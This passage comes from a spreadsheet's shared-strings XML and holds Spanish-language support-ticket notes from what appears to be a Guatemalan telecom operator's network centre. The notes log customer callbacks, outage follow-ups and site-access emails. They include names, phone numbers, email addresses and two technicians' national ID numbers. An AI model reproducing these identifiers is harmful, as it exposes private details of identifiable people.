    <t>SE LLAMA A CLIENTE OSCAR MORAN 43915637 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001824808</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, EQUIPO INHIBIDO EN NODO; SE VALIDARÁ SERVICIO A LAS 15:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4605358</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL MARIBEL LIQUES 66769946 ID: 3001853135/3001853327 NO RESPONDE*/*/*/
*/*/*/SE VERIFICA OTROS CONCTACTOS EN TT ANTERIORES, SE LLAMA A MARIBEL LIQUES 30568031 ID: 3001853442, CLIENTE INDICA QUE ELLA PERCIBE MUY LENTO EL INTERNET, PERO NO HA REALIZADO PRUEBAS DIRECTO AL EQUIPO DE CLARO E INFORMA QUE SOLO TIENE 3 USUARIOS CONECTADOS, INDICA QUE LE GUSTARÍA QUE LLEGUE UN TÉCNICO A REVISAR SUS CPU¿S, SE LE EXPLICA QUE LA ADMINISTRACIÓN DE RECURSOS A NIVEL LAN DEBE REALIZARLA SU TÉCNICO INTERNO, YA QUE A NIVEL WAN TODO SE ENCUENTRA OPERATIVO, LO ÚNICO QUE OBSERVAMOS ES QUE PRESENTAN PICOS DE SATURACIÓN SOBRE LOS 10MBPS, SI GUSTA ORIENTACIÓN SOBRE ESTE TEMA PUEDA AVOCARSE CON SU EJECUTIVO, INDICA QUE ENTONCES VALIDARÁ INTERNAMENTE Y CORTA LLAMADA*/*/*/</t>
  </si>
  <si>
    <t>F4605367</t>
  </si>
  <si>
    <t>SAMUEL CRUZ-71706110   INDICA QUE  APERTURO LOS DOS TICKET DE POLLO PARA MONITOREO ## ADEMAS- CONFIRMAQ UE ESTA ACTIVOS LOS SERVICIO + SE REALIZA PRUEBA DE LLAMAA AL GDN Y LLAMADA SI COMPLETA
3001751288
COLA:
NOMBRE: A: 0050371706110
NÚMERO: 0050371706110
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050371706110
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 17/06/2022 11:00:03
RESULTADO: LLAMADA HECHA
NOMBRE: 0050371706110
NÚMERO: 0050371706110
INICIO: HOY, 10:59
FIN: HOY, 11:01
DURACIÓN: 1:32
ID DE LLAMADA: 3001751288</t>
  </si>
  <si>
    <t>F4605370</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOAQUIN ESCOBAR QUIEN VALIDA EL SERVICIO.
3001829063
COLA:
NOMBRE: A: 41820623
NÚMERO: 41820623
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 41820623
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 15:17:57</t>
  </si>
  <si>
    <t>F4605390</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A PERSONAL DE IE-NETWORKS CONSULTANDO SEGUIMIENTO DEL TICKET, EN ESPERA DE APOYO DE ÉSTOS.
ASUNTO: RE: F4605390// GDN 23783900// TSE 6TA AVENIDA 0-32 ZONA 2, GUATEMALA</t>
  </si>
  <si>
    <t>SE LLAMA A EVELYN ALVAREZ AL 54829794 CLIENTE SOLICITA SE LE LLAME EN 5 MINUTOS YA QUE NECESITA CONFIRMAR LA INFORMACIÓN A COLOCAR EN EL MENSAJE DEL IVR. ID: 3001774243</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN ANDREA ÁLVAREZ 46153837 RESPONDEN INDICANDO NUMERO EQUIVOCADO
-ID 3001773913</t>
  </si>
  <si>
    <t>CLIENTE EVELYN ALVAREZ 54829794 SOLICITA SE CONFIGURE EL MENSAJE DE VOZ EN EL IVR DE SU GDN 23783900, ASI MISMO, CONFIGURAR LAS SIGIENTES OPCIONES DEL IVR. LLAMADA DESDE VIVO. SE ENVIARÁ AL PROVEEDOR LA SOLICITUD DEL CLIENTE
OPCIÓN 1 MARQUE 1  REGISTRO CIUDADADO               EXT 16119
OPCIÓN 2 MARQUE 2  ORGANIZACIONES POLÍTICAS   EXT 16207
OPCIÓN 3 MARQUE 3  DEPARTAMENTO DE ELABORACIÓN DE PATRONOS EXT 12213
OPCIÓN 4 MARQUE 4  DIRECCION ELECTORAL              EXT 19535
OPCIÓN 5 MARQUE 5  DEPARTAMENTO DE COMPRAS EXT 11156
MARQUE 6 INSTITUCO DE FORMACION Y CAPACCITACION 15107</t>
  </si>
  <si>
    <t>F4605400</t>
  </si>
  <si>
    <t>SE PREPARA TOMA DE TRAZADO
SE INFORMA A CLIENTE SI PUEDEN REALIZAR LLAMADAS EN ESTE MOMENTO A ESE NUMERO, CLIENTE CARLOS INDICA QUE ESTARA REALIZANDO CONFERENCIA CON ALGUIEN EN SITIO PARA REALIZAR LAS PRUEBAS, NOS MANTIENE EN LINEA MIENTRAS REALIZA CONFERENCIA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MIGUEL 42754228 PARA INDICARLE DE LAS PRUEBAS QUE SE REALIZARON Y QUE SE TIENE UN DESVIO A UN NUMERO 33572771 PERO NO SE TIENE RESPUESTA SE LLAMARA NUEVAMENTE EN UNSO MINUTOS3#LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE CARLOS COMENTA QUE EL DIA VIERNES COLOCARON UN DESVIO INTERNO A ESE NUMERO DE TELEFONO 33572771  POR QUE NO COMPLETABAN LAS LLAMADAS DE LA PBX A LA AGENCIA Y NECESITABA COMUNICARSE, CLIENTE INDICA QUE AUN SIGUEN CON EL PROBLEMA, SE LE INDICA QUE SE ENVIOARA PERSONAL TECNICO A REALIZAR PRUEBAS DE CERTIFICACION, EMULANDO SER LA PBX PARA QUE PUEDA REALIZAR LLAMADAS DE PRUEBA AL 22562856   Y VERIFICAR SI LE DA TONO O NO, CLIENTE QUEDA ENTERADO E INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL PROBLEMA SE ENCUENTRA AL MOMENTO DE LLAMAR DEL E1 24948100 HACIA EL NUMERO 22562856  QUE ES UN CINTRIX, INDICA QUE LA LLAMADA NO COMPLETA, PERO SI SE LLAMA DE CUALQUIER CELULAR O OTRA LINEA FIJA LA LLAMADA SI COMPLETA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4605410</t>
  </si>
  <si>
    <t>PERSONAL DE IE-NETWORKS YA ESTÁ DANDO SEGUIMIENTO A LA SOLICITUD PLANTEADO POR CLIENTE, AVANCES EN EL TRANSCURSO DE LA TARDE; ADICIONAL SE BRINDAN AVANCES DEL TICKET A CLIENTE VÍA CORREO:
ASUNTO: RE: CAMBIO DE NOMBRE EN LA EXTENSIÓN</t>
  </si>
  <si>
    <t>F4605422</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 47391182 PARA SEGUIMIENTO, NO CONTESTA; SE BUSCA EN TICKET ANTERIORES, SE ENCUENTRAN LOS TELS DE HANS DE LEON/59184108 Y ROSAURA RAMIREZ 58158066. EL PRIMERO ME BRINDA EL TEL JOSÉ EFRAÍN PÉREZ/CLIENTE 33200647.
SE TIENE EN LÍNEA A ÉSTE, SE PIDE APOYO A GESTIÓN AE VÍA SKYPE, VÍA TELEFÓNICA APOYA MARÍA GODÍNEZ/GESTOR AE, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSÉ EFRAÍN PÉREZ  33200647 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001119210</t>
  </si>
  <si>
    <t>SE LLAMA AL FISCALIZACIONVIPERSA47391182   2 VECES ##ENVIA A BUZON##SE INTENTARA LUEGO
3001780866
COLA:
NOMBRE: A: 47391182
NÚMERO: 47391182
DURACIÓN: 0:00:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47391182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 17/06/2022 12:30:47
RESULTADO: LLAMADA HECHA
NOMBRE: 47391182
NÚMERO: 47391182
INICIO: HOY, 12:28
FIN: HOY, 12:28
DURACIÓN: 0:18
ID DE LLAMADA: 3001780765</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JOSÉ EFRAÍN PÉREZ/CLIENTE 33200647 ##  COMENTA QUE SE DE SEGUIMIENTO EL DIA LUNES A LAS 7 ##VIVO</t>
  </si>
  <si>
    <t>F4605423</t>
  </si>
  <si>
    <t>###SE COORDINA VISITA PARA MAÑANA 18/06/2022 A LAS 9 AM###
DE: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 10:39
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE ACCESOS F4605191| 8901721T |CC_BANRURAL_GT_AGENCIA_0654 | REDUNDANCIA WIMAX.- 6A. CALLE 3-58, CANTON LAS FLORES, SAN VICENTE PACAYA ECUINTLA
BUEN DÍA
SE BRINDA ACCESO EN EL HORARIO INDICADO.
ANIBAL ROBERTO GONZÁLEZ MANZO
ANALISTA DE REDES
DIRECCIÓN DE TELECOMUNICACIONES
ANIBAL.GONZALEZ@BANRURAL.COM.GT
AV. LA REFORMA 9-30 ZONA 9
PBX: (502) 1720- EXT. 301645 Y 301690
FAX: (502) 2504-1501
WWW.BANRURAL.COM.GT
DE: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 10:13
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE ACCESOS F4605191| 8901721T |CC_BANRURAL_GT_AGENCIA_0654 | REDUNDANCIA WIMAX.- 6A. CALLE 3-58, CANTON LAS FLORES, SAN VICENTE PACAYA ECUINTLA
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4605191| 8901721T |CC_BANRURAL_GT_AGENCIA_0654 | REDUNDANCIA WIMAX.- 6A. CALLE 3-58, CANTON LAS FLORES, SAN VICENTE PACAYA ECUINTLA
AGRADECEMOS GESTIONAR ACCESO SÁBADO 18/06/2022  A LA 09:00
TÉCNICOS:
JUAN PABLO GONZALEZ GARCIA                   DPI     2260509981308
DONALD FERNANDO MAYORGA CASTILLO  DPI     2256091261301
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4605429</t>
  </si>
  <si>
    <t>SE ENVIA CORREO SOLICITANDO APOYO CON REVISION DE UPS EN BUEN ESTADO POR REINCIDENCIA, EN LO QUE VA DEL MES DE JUNIO SE TIENEN 13 FALLAS.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE
REFERENTE AL ENLACE PARA EL SITIO CC_GMG_GT_INTERNET_POPTUN, SOLICITAMOS SU APOYO VALIDANDO SI LOS EQUIPOS DE RED SE ENCUENTRAN CONECTADOS A UN UPS Y SI ESTE SE ENCUENTRA EN BUEN ESTADO YA QUE OBSERVAMOS EN NUESTRO MONITOREO FALLAS RECURRENTES POR REINICIO EN EL EQUIPO CISCO CISCO1921/K9.
TICKET: F4605429
ID: 313900299T
IDENTIFICADOR DEL CLIENTE: CC_GMG_GT_INTERNET_POPTUN
UBICADO EN: INTERNET_5 CALLE Y 6 AVENIDA ESQUINA ZONA 1 POTUN PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CARLOS LEAL: +502 5516 8193 PERO NO SE TIENE RESPUESTA, SE LLAMARA EN OTRO MOMENTO.
1001278756
COLA:
NOMBRE: A: 55168193
NÚMERO: 55168193
DURACIÓN: 0:00:14
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55168193
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 20/06/2022 16:29:36
1001278394
COLA:
NOMBRE: A: 55168193
NÚMERO: 55168193
DURACIÓN: 0:00:20
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55168193
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 20/06/2022 16:29:31</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE CON EL TEMA DE UPS || SE ENVIA CORREO SOLICITANDO APOYO CON REVISION DE UPS EN BUEN ESTADO POR REINCIDENCIA, EN LO QUE VA DEL MES DE JUNIO SE TIENEN 13 FALLAS. || DE NO RECIBIR RESPUESTA SE LLAMARA EL DIA DE MAÑANA EN HORARIO HABIL CARLOS LEAL CEL: +502 5516 8193  DE LA CENTRAL DE GMG EN GUATEMALA
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
SOLICITO SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE OBSERVA QUE ENLACE HA GENERADO VARIAS ALARMAS QUE SUCEDEN A LA ACTUAL, SE OBSERVA QUE CLIENTE NO HA BRINDADO RESPUESTA AL CORREO ENVIADO SE HA VUELTO HA ENVIAR CORREO DE SEGUIMIENTO || SE BRINDARA SEGUIMIENTO EN HORAIO HABIL.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE CON EL TEMA DE UPS || SE ENVIA CORREO SOLICITANDO APOYO CON REVISION DE UPS EN BUEN ESTADO POR REINCIDENCIA, EN LO QUE VA DEL MES DE JUNIO SE TIENEN 13 FALLAS.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
SOLICITO SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4605436</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA MONSERRAT GARRIDO  SOLICITA QUE SE LE ENVIE CORREO CON EVIDENCIAS Y EL NUMERO DE CASO || SE NOTIFICA A GESTOR**
-ID 3001771368
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, INFORMANDO QUE TIENE DESCONECTADA SU LAN, A LA EPERA DE VALIDACION.
RE: SOLICITUD DE SOPORTE ::: ID LOCAL CARGILL - EL CAFETAL 2 -CONTR0002114171OC ::: "FUERA DE SERVICIO " || IMCRL004803</t>
  </si>
  <si>
    <t>F4605437</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY GARCIA 55550306  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA LLAMADA PARA EL LUNES AL MEDIO DIA VALIDAR EL FUNCIONAMIENTO
-ID 3001855166</t>
  </si>
  <si>
    <t>F4605443</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ROBERTO LOPEZ, QUIEN INDICA QUE NO TIENE INCONVENIENTES PERO NECESITA REALIZAR MAS PRUEBAS SOLICITA QUE SE LE LLAME MAÑANA A LAS 9:00AM
3001850464
COLA:
NOMBRE: A: 59461182
NÚMERO: 59461182
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 59461182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 16:36:47</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 59461182/59229511 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; LLAMAR HASTA EL DÍA LUNES A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ROBERTO LOPEZ, QUIEN INDICA QUE HASTA EL MOMENTO NO HA TENIDO INCONVENIENTES.
SOLICITA QUE SE LE LLAME A LAS 16:00HRS.
3001832820
COLA:
NOMBRE: A: 59461182
NÚMERO: 59461182
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 59461182
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 15:31:24</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ROBERTO JUAREZ 59461182 QUIEN COMENTA QUE HA HECHO PRUEBAS DE LLAMADA Y YA NO HA PRESENTADO INCONVENIENTE, SOLICITA SE LE LLAME EN 1 HORA PARA VALIDAR. ID DE LLAMADA: 3001902542</t>
  </si>
  <si>
    <t>F4605475</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YURIS AL 80103493 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO **
-ID 3001803126
**</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE YURIS /80103493 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 3001788618 - 3001789348</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE UBER FLORES 83525472 PARA SOLICITAR OTRO CONTACTO PERO NO RESPONDE
-ID 3001820969</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 87778664 PERO ENVIA DIRECTO A BUZON
-ID 3001820428</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YURIS AL 80103493 CL NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001778235
**</t>
  </si>
  <si>
    <t>SE LLAMA A PR 87778664 ENVIA A BUZON, SE INTENTARA LUEGO
-ID 3001836571</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE UBER FLORES 83525472 QUIEN BRINDA OTRO CONTACTO DE PR 87778664
-ID 3001819913</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YURIS /80103493  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001819190</t>
  </si>
  <si>
    <t>F4605479</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO ESCOBAR AL 30153240  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001779656 -
**</t>
  </si>
  <si>
    <t>F4605482</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A JORGE HERNÁNDEZ/CLIENTE CONSULTA SI SERÁ NECESARIO QUE ENVÍEN TÉCNICO DEL LADO DE ELLOS, SE PIDE APOYO A DARWIN ESPAÑA/GESTOR CNOC; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>** SE INTENTA CONSULTAR CON CENTRAL 41996735 / 58652751, NO RESPONDEN, SE LLAMARA LUEGO
ID DE LLAMADA: 1001446008
ID DE LLAMADA: 1001446044</t>
  </si>
  <si>
    <t>F4605491</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 16:41
PARA: OTTO PERALTA &lt;OPERALTA@GTA.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GRUPO DE TIENDAS ASOCIADOS || 361700017T || SD1136014
BUENA TARDE
    EN SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
SE VALIDA QUE EL SERVICIO ESTA SIENDO SATURADO POR LO QUE PUEDEN OBSERVAR LENTITUD, INESTABILIDAD O INCLUSO ALGUNAS CAÍDAS.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE, VALIDANDO LO DICHO POR SOC CLARO EN CRONO ANTERIOR.</t>
  </si>
  <si>
    <t>F4605505</t>
  </si>
  <si>
    <t>SE LLAMA A CLIETNE 3 VECS ## RANDALL HERNANDEZ-49722291  #3 MANDA A BUZON ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RANDALL HERNANDEZ-49722291 PERO NO RESPONDE
-ID 1001203274 - 1001202662</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INGRID GARCIA 24454395 QUIEN SOLICITA SE PUEDA COMPARTIR EL DIAGNOSTICO DE LA VISITA AL CORREO PARA QUE ELLOS PUEDAN VALIDAR LA PBX
HSVDEPARTAMENTODECOMPRAS@GMAIL.COM
-ID 1001204422</t>
  </si>
  <si>
    <t>SE LLAMA EN DOS OCASIONES A CADA NUMERO BRINDADO COMO CONTACTO 49722291 / 24454395 Y NO SE TIENE RESPUESTA DEL CLIENTE (RANDALL HERNANDEZ / INGRID GARCIA).  SE INTENTARÁ CONTACTAR LUEGO, SE REQUIERE REVISIÓN DE LOS EQUIPOS DE UM YA QUE LOOP HASTA LA REPISA DE TX SE OBSERVO PERO E1 SIGUE CAIDO. LLAMADAS REALIZADAS DESDE VI-VO</t>
  </si>
  <si>
    <t>F4605513</t>
  </si>
  <si>
    <t>SE ESCALÓ CON ALEJANDRO URIZAR/INGENIERÍA CLARO, INDICA QUE ESTÁ FUERA DE OFICINA, EN 15/20 MINUTOS RETORNA Y NOS APOYARÁ CONTESTANDO EL CORREO:
ASUNTO: SOLICITUD DE PERMISOS | 941500002T | GLOBAL MOBILITY APEX S.A.</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A ALEJANDRO URIZAR PARA QUE SE GESTIONE LOS ACCESOS A KIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 14:19
PARA: EDUARDO ALEJANDRO URIZAR ESTRADA &lt;EDUARDO.URIZAR@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 941500002T | GLOBAL MOBILITY APEX S.A..
BUENA TARDE ESTIMADO ALEJANDRO, UN GUSTO SALUDARLE.
GLOBAL MOBILITY APEX S.A..
941500002T
POR ESTE MEDIO SOLICITO DE SU APOYO PARA GESTIONAR LOS ACCESO NECESARIOS PARA EL INGRESO A KIO , ADJUNTO EL LISTADO DEL PERSONAL TÉCNICO, QUE ATENDERÁ EL CUENTE CON DISPONIBILIDAD AL MOMENTO QUE SE PERMITA EL INGRESO.
ADJUNTO LOS DATOS DE LOS TÉCNICOS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O ATENTO A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4605515</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY AVILES 42105672 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001852320</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 16:30 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4605533</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: VIERNES, 17 DE JUNIO DE 2022 12:48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3585
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM35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5533
ID: 47502410T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3585
UBICADO EN: CAJERO 3585 TIENDA MAAS HACIENDA REAL, 24 AV. 31-89 Z.16 HACIENDA REAL LOCAL 1 Y 2
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4605546</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE VALIDANDO LO DICHO POR PERSONAL DE BO ACCESO.</t>
  </si>
  <si>
    <t>F4605554</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RAMOS AL 30318896  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001812581
**</t>
  </si>
  <si>
    <t>F4605555</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR IRMA 59108492 ID: 3001848698/3001848810 INDICA QUE SI ESTA EN EL LUGAR Y PUEDE APOYAR CON PRUEBAS, SE CONTACTA ALEJANDRO.NAVARRO 22245386 ID: 3001848975 Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YASMIN 54197370 MENCIONAN QUE ES NUMERO EQUIVOCADO
-ID 3001791350 - 3001791804</t>
  </si>
  <si>
    <t>F4605557</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BARBARA SEQUEN 41517131 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001826322</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BARBARA SEQUEN 41517131 MENCIONA QUE ESTA EN SU TIEMPO DE ALMUERZO POR LO QUE SOLICITA LLAMADA EN  1 HORA CON 30 MIN
-ID 3001796079</t>
  </si>
  <si>
    <t>F4605609</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YENIFER COMENTA QUE EL LOCAL YA SE ENCUENTRA ABIETO QUE SE PROCEDE CON VISITA
3001890617
COLA:
NOMBRE: A: 50433648107
NÚMERO: 50433648107
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50433648107
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 18/06/2022 08:06:25</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YENIFER MARADIAGA 33648107 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001822428</t>
  </si>
  <si>
    <t>F4605611</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DANY RUIZ PERO NO CONTESTA.
3001867336, 3001867437.
COLA:
NOMBRE: A: 52933268
NÚMERO: 52933268
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 52933268
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 18:05:52</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DANNY RUIZ PERO NO CONTESTA.
3001833826, 3001833996, 3001834044
SE LLAMARA ENSEGUIDA.
COLA:
NOMBRE: A: 52933268
NÚMERO: 52933268
DURACIÓN: 0:00:25
ESTADO: MARCANDO
DETALLES: 52933268
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 15:34:56</t>
  </si>
  <si>
    <t>F4605614</t>
  </si>
  <si>
    <t>VISITA PARA DIA LUNES 20/06 7 HRS // SERVICIO DOWN // NO SE ALCANZA EQUIPOS DE CLIENTE, SERVICIO CON 1 HORA 45 MINUTOS ACUMULADOS EN BOTX Y CCR GT
SE ENVIA CORREO A CLIENTE CON LOS DATOS DEL PERSONAL ASIGNADO
ASUNTO: RE: CAÍDO ENLACE_CLARO-XT_PP2_SECUNDARIO_ID(672400015)
ERITO FERNANDO TECU XITUMUL
BUENA NOCHE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 672400015T || CMI - SISTEMAS Y EQUIPOS || KM 93.5 CARRETERA AL CAJON SANTA LUCIA COTZULMALGUAPA.
